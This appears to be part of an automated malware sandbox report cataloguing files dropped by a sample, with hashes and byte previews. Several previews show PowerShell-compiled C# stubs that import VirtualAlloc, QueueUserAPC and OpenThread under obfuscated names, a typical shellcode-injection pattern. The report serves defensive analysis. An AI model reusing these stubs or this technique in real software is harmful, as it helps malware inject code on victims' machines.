SHA-512:	A0BF56CF8D7AC8282865A92BB078BF87969350835E084FB35102FA024840AD83A2F8B576D4ACE700B0115428B171EBA561B2B8401AFD7A72A813603C48C02273
Malicious:	false
Reputation:	unknown
Preview:	L...YiEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP...................B..;p?..PW.\|...........4.......C:\Users\user\AppData\Local\Temp\RESA4F5.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...i.y.r.5.j.f.x.4...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESB08E.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:02:20 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.9528013256881853
Encrypted:	false
SSDEEP:	24:HwinW9QhfNSrIDfHQhKdNWI+ycuZhNciakS3jPNnq9hgd:QE5ZICSKd41ulcia33Jq9y
MD5:	57F8508B9E03657DA7C5A87EEA18BAAA
SHA1:	71F9E682768BC760A4B8A0E52EE6506626EF68A7
SHA-256:	26EF77313E0E1C50CC2E15F74FFF4974D53569CB6059F09FF8E2D0401F9E0FA6
SHA-512:	447D871DD245FAFE830E5529F2E862BA60A8A68579CE335778350B4749F9C9DD7F1C8FE88FE75A8DB6FFDCA5D77E7E4AEBDD464A80131C71EF79655B20FDD4AF
Malicious:	false
Reputation:	unknown
Preview:	L...\iEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........J....c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP.................rP..%..yGEr..7...........4.......C:\Users\user\AppData\Local\Temp\RESB08E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.x.p.j.p.f.g.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\RESFA7A.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x482, 9 symbols, created Tue Oct 11 13:04:57 2022, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1320
Entropy (8bit):	3.96588848592824
Encrypted:	false
SSDEEP:	24:HbinW9Nf5iDfHkhKdNWI+ycuZhN5pYakSmpNPNnq9hgd:7Eo5YWKd41ul5ia3mJq9y
MD5:	365B2DDE68DD5DB77B55D895F51C2174
SHA1:	03072AA9C3ABD407B126A6482E0877C9D8479B75
SHA-256:	D5F9C718799ABB0296D27C06B42E0BE654CC8B5933E0CF579884927182784AD1
SHA-512:	21ED8EBC7469938A6F9577D8C778330079287CC439D5329A843A9F9DAE569346E988C3ABD9C699FD866335DBF35F159DC145AC33E86A5149B1D3546953EE173F
Malicious:	false
Reputation:	unknown
Preview:	L....iEc.............debug$S........D...................@..B.rsrc$01........X.......(...........@..@.rsrc$02........P...2...............@..@........K....c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP....................4]"Fm..B.>...........4.......C:\Users\user\AppData\Local\Temp\RESFA7A.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.i.h.j.3.z.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_akfsyqoz.ont.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0v3avdz.ytr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pigzubgt.i2t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yf122sov.tys.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	410
Entropy (8bit):	4.963679469380117
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ7PMRSR7a1e3amPZERG9cQJSSRa+rVSSRnA/fzTmOoqy:V/DTLDfupnh3NP62v9rV5nA/+OFy
MD5:	9A10482ACB9E6952B96F4EFC24D9D783
SHA1:	5CFC9BF668351DF25FCDA98C3C2D0BB056C026C3
SHA-256:	A0424E1530F002761A882C19C22504153A5E86D7FBB41391E940452BFA15F377
SHA-512:	E932914AD99D7BD39561E020D1E8C1F4E175C16EAE66DF720100C65E40CCC3383B5145F703432885F3F1CE080E8A4FEB045DDD5C8BBC2F3231C619D04182AC28
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class eyoluiidmup. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr shtskfruaek,IntPtr nxcjsjshatc,IntPtr oryck);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint icv,uint tulhsch,IntPtr rubl);.. }..}.

C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.25961361651255
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f5Fzxs7+AEszIwkn23f5nAn:p37Lvkmb6KRfxFWZEifxnA
MD5:	41EA27173EA5237D3FB04E0938CFE468
SHA1:	72F134BE8AB8EE4B90D48AB1C70A6E0CC8496E19
SHA-256:	82F2B3ED6D202F625A3B3922D95F0C850DB9DF82223336CB2808E076EB10AB48
SHA-512:	ED806EA91C88220F294FB15A362D22B0E86C7D25B684DC8D2764478682C801A3F9971D000F56708E9000BA83DE65322CF9F25B072DAD7AB00B56C50E7D402C53
Malicious:	true
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs"

C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.624097342383811
Encrypted:	false
SSDEEP:	24:etGSc8mmUcg85BIFtNA6o45yK1PtkZf1rYhkWI+ycuZhNtakS7PNnq:6eXcb5BIVHZyKAJ1oH1ulta3xq
MD5:	78D2CB92273FA086CE6EF0C4A2A2062E
SHA1:	EA7959992DCB2CC3DA8B8357845452F128D15C23
SHA-256:	C287B25A6439BE1E8BCDA7CB34A3E4768AE477A22B0F308BA801A5757A9CF57C
SHA-512:	483E3855E53CBE21785EB7B5E432F07823B6454AC15D9F8D37202C8728340FB33C7B8A44DECDEC4FF137D35312DC2C3F961B69DDBBCBE40EDA0CC915672BA880
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...YiEc...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..`.............................................................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0...............$.......................#.............. >............ K............ ^.....P ......i.........o.....{...........................i. ...i...!.i.%...i............3.7.....>.......K.......^...........

C:\Users\user\AppData\Local\Temp\iyr5jfx4.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.329767570905719
Encrypted:	false
SSDEEP:	24:AId3ka6KRfEEifx1KaM5DqBVKVrdFAMBJTH:Akka6CEEuLKxDcVKdBJj
MD5:	F7BFFD90D92AC40E0E09A685268B5166
SHA1:	3B81539C8B5081E1C48C8FCD3A1F79C7662E4DE4
SHA-256:	9360F920DE793FB46C49399584E51E1CD57EC7B6A05503B227CE3EF86EE4CE02
SHA-512:	6781E649350280DC287FBC48F45468BD0E7AA5A698F44092F869D08225A8019E34982FB21ABAA0E8F0BF790C6C806D807E13F94C0D36788E728844F889A91F10
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\iyr5jfx4.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\iyr5jfx4.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	400
Entropy (8bit):	5.009731388510524
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJPFMRSRa+eNMjSSRrwsJbF4JSSRNf9ONU2hqfYy:V/DTLDfuZV9eg5rnbCvRicQy
MD5:	ACA9704199C51FDE14B8BF8165BC2A4C
SHA1:	789B408CCAD29240BD093515CBD19A199AD2C1C8
SHA-256:	CB3DA8A9768252634F8ED4C62E026DC8217B055E00F11B6012A52ED130C92C27
SHA-512:	A8C1DF598581F508ECBF1E516744F11ABFB71EC6BB9895D0B61F15E70E56E27CB40B4E5395B9411B787F8BB4F264CA704D815260677909DC1E599D601D0B5DE6
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class rxp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bktrlwbb,uint jvtwfryoxhu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr wcsq,uint kwadeor,uint sxyudrlevk,uint wvqgwsxfs);.. }..}.

C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.262801964221568
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fjMUzxs7+AEszIwkn23fja:p37Lvkmb6KRfgUWZEif+
MD5:	6E87DCCF81F408D0D005D726FB2EBC7B
SHA1:	8F4B2A0C2D059A3C3367624C837575DD8B780B52
SHA-256:	7AEA6EAABC761D4E0727E8D57BF63509E75CF50297E8559F928F2D8309354C8A
SHA-512:	E69B36EF073614CCCF5247312D86B71EB0BE3A389DE2078254DE9239A970EEAB998E56FBDD9C4EB59461E1781A3231E33ABBFA1A1ACF6FE3E77D6FEF23B8426A
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs"

C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6212555479867756
Encrypted:	false
SSDEEP:	24:etGSL8OmU0t3lm85xAqZhqtedWhoytkZfh4PUWI+ycuZhNciakS3jPNnq:65XQ3r5xAqiOWhSJh4P31ulcia33Jq
MD5:	E38E89CE8DC5DA8A0E9BEF10B5E19F15
SHA1:	F63F7475EF2DCA8129782EC0832E19C9D2C6ECEC
SHA-256:	F6CE234E0983854AF6CD792B97E555C3F39755C43C5ACC37966B0DC93D91C0B5
SHA-512:	AA0AE0F995CFB1C3016CDDC95AD4EDDD2B238EB0232C4BA70EA5AA6B1896EEE5D6A49605F8E05E10E7DD8D5AC792F7B884DF2C7AAD6A1E7444F7C355EFB4CD29
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...\iEc...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..\.............................................................(....BSJB............v4.0.30319......l...H...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(............... ...................................... 6............ H............ P.....P ......].........c.....l.....x.....}...............]. ...]...!.].%...]............3.3.....6.......H.......P...........

C:\Users\user\AppData\Local\Temp\jxpjpfgv.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.332008921213867
Encrypted:	false
SSDEEP:	24:AId3ka6KRfg1EiffKaM5DqBVKVrdFAMBJTH:Akka6CQEufKxDcVKdBJj
MD5:	3D16A2B045885BC6BC6B152FAB36AB4E
SHA1:	05EDFD5B920187BCEEBD93E656C2046E5A4F1B13
SHA-256:	331987B5EC04F61671E1044FDF6A98AC4A7BA37B513C73B49CBBA4C104AD6F94
SHA-512:	BEF3ED07BF25AA429EDA761FBED40775C3DF708EF285D6C15D168B21D50B31F4C33C3A61BC2A4F49C7F00431A92AB0C69156D77CB7ECAEE519B8D04ADE573F4D
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jxpjpfgv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jxpjpfgv.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	410
Entropy (8bit):	4.963679469380117
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJ7PMRSR7a1e3amPZERG9cQJSSRa+rVSSRnA/fzTmOoqy:V/DTLDfupnh3NP62v9rV5nA/+OFy
MD5:	9A10482ACB9E6952B96F4EFC24D9D783
SHA1:	5CFC9BF668351DF25FCDA98C3C2D0BB056C026C3
SHA-256:	A0424E1530F002761A882C19C22504153A5E86D7FBB41391E940452BFA15F377
SHA-512:	E932914AD99D7BD39561E020D1E8C1F4E175C16EAE66DF720100C65E40CCC3383B5145F703432885F3F1CE080E8A4FEB045DDD5C8BBC2F3231C619D04182AC28
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class eyoluiidmup. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr shtskfruaek,IntPtr nxcjsjshatc,IntPtr oryck);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint icv,uint tulhsch,IntPtr rubl);.. }..}.

C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.238728345472457
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f/OWt+zxs7+AEszIwkn23f/OW1n:p37Lvkmb6KRfONWZEifOo
MD5:	8E560ADAE2A4E65EFEDF1480CB1BEC6D
SHA1:	65FF7F856A25D372758B4283BDBC1E75F04F748F
SHA-256:	96AFAAAD879E57C2F41001F8B7A39C78E1FC26684DBD19C394A173E87AC5EA36
SHA-512:	DC9D33A05168645C7F0A863456C10D3EFF9EF4444DC4F3359F4A19EAFD3116CEF101111E36D560909636A106316AE3480B90DEDDA951C83794DCD6158BDA5107
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\msihj3zd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs"

C:\Users\user\AppData\Local\Temp\msihj3zd.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6197342351514084
Encrypted:	false
SSDEEP:	24:etGSw8mmUcg85BIFtNA6dx45yK1PtkZfs1lchkWI+ycuZhN5pYakSmpNPNnq:6CXcb5BIVHuyKAJs1aH1ul5ia3mJq
MD5:	B0E7264EC04A22CF4907E47C0B9E652A
SHA1:	77920522398FBB457DC198F19B6EA9FFE547F153
SHA-256:	E6EEEDFBE01E9EB3E6092E94D61FD537F92BD11A725BBF73F338BC1C26F450FA
SHA-512:	3C31A6C39F2E63CB28EFE03EBB55199CFAFDCFF1CBA42786EB4F45B37DD716571AA4CBDA6749484FF00786647A73B746F1EBF890B938E63D40F3E92CEFAD1C6F
Malicious:	false
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iEc...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..`.............................................................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................7.0...............$.......................#.............. >............ K............ ^.....P ......i.........o.....{...........................i. ...i...!.i.%...i............3.7.....>.......K.......^...........

C:\Users\user\AppData\Local\Temp\msihj3zd.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (427), with CRLF, CR line terminators
Category:	modified
Size (bytes):	848
Entropy (8bit):	5.321699664902414
Encrypted:	false
SSDEEP:	24:AId3ka6KRfOiEifOdKaM5DqBVKVrdFAMBJTH:Akka6COiEuOdKxDcVKdBJj
MD5:	9F6C27FDCF8BE079EBB365AADCF60111
SHA1:	FE7A519F262401A6737DEAD508FF60343DF484D3
SHA-256:	E6EE327BAA0B0F06C70BBA8426F9384A73A6FFCC1FE7E22704535333767AF394
SHA-512:	DB4EE270D4DE0719342A73C21D3318424EA13FAD2488ECF6D22C7FA67EA23CE0BF8B2985665C09C418FBF39482BD7426BA983FF26F6C1C5DEB44B52304806C40
Malicious:	false
Reputation:	unknown
Preview:	.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\msihj3zd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\msihj3zd.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\vupj0yhs.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	400
Entropy (8bit):	5.009731388510524
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJPFMRSRa+eNMjSSRrwsJbF4JSSRNf9ONU2hqfYy:V/DTLDfuZV9eg5rnbCvRicQy
MD5:	ACA9704199C51FDE14B8BF8165BC2A4C
SHA1:	789B408CCAD29240BD093515CBD19A199AD2C1C8
SHA-256:	CB3DA8A9768252634F8ED4C62E026DC8217B055E00F11B6012A52ED130C92C27
SHA-512:	A8C1DF598581F508ECBF1E516744F11ABFB71EC6BB9895D0B61F15E70E56E27CB40B4E5395B9411B787F8BB4F264CA704D815260677909DC1E599D601D0B5DE6
Malicious:	false
Reputation:	unknown
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class rxp. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bktrlwbb,uint jvtwfryoxhu);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr wcsq,uint kwadeor,uint sxyudrlevk,uint wvqgwsxfs);.. }..}.

C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (348), with no line terminators
Category:	dropped
Size (bytes):	351
Entropy (8bit):	5.247994812995126
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fYqzxs7+AEszIwkn23fYP:p37Lvkmb6KRfAqWZEifAP
MD5:	339334B154CE1D3CA1A117562DD8E974
SHA1:	D600CBC9C52B76E9EACFCD87AC1E80F07CFA33D9
SHA-256:	E64EDFE26E2A57197F58A00B0BED45D7C42394B108E5D574C39339E88F7E83B6
SHA-512:	68A103108708D7082152C64E523FB9B90061C2450925C9A4157D213F3B8B9038132B31D9FE90D71770D19D5DCE8CA85C9257A89ADB2D5CEA8B27BB30B4A513F7
Malicious:	false
Reputation:	unknown
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\vupj0yhs.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\vupj0yhs.0.cs"

C:\Users\user\AppData\Local\Temp\vupj0yhs.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.616515604399693
Encrypted:	false
SSDEEP:	24:etGSqls8OmU0t3lm85xAqZhqidWhoytkZfzeUWI+ycuZhNBakSvPNnq:6emXQ3r5xAqicWhSJze31ulBa3tq
MD5:	F49B29BB3482B2AE2D9467860AFDC125
SHA1:	68F9D5289A0E6CEFA745A75136F8F6B319752097
SHA-256:	AAAB10BF07C27FECA11A65C13C798EB184B5442F2362A6C3CA8ABDC8800B714E
SHA-512:	33A7651DE2C07B625CF2EDD20BD47734F9BD9E0CB20F273D725575CF2A4C4AEC9A0279849B83092D7EA884E04B89CAD0B1089E8045031700A42CA250D8892187
Malicious:	false
Reputation:	unknown
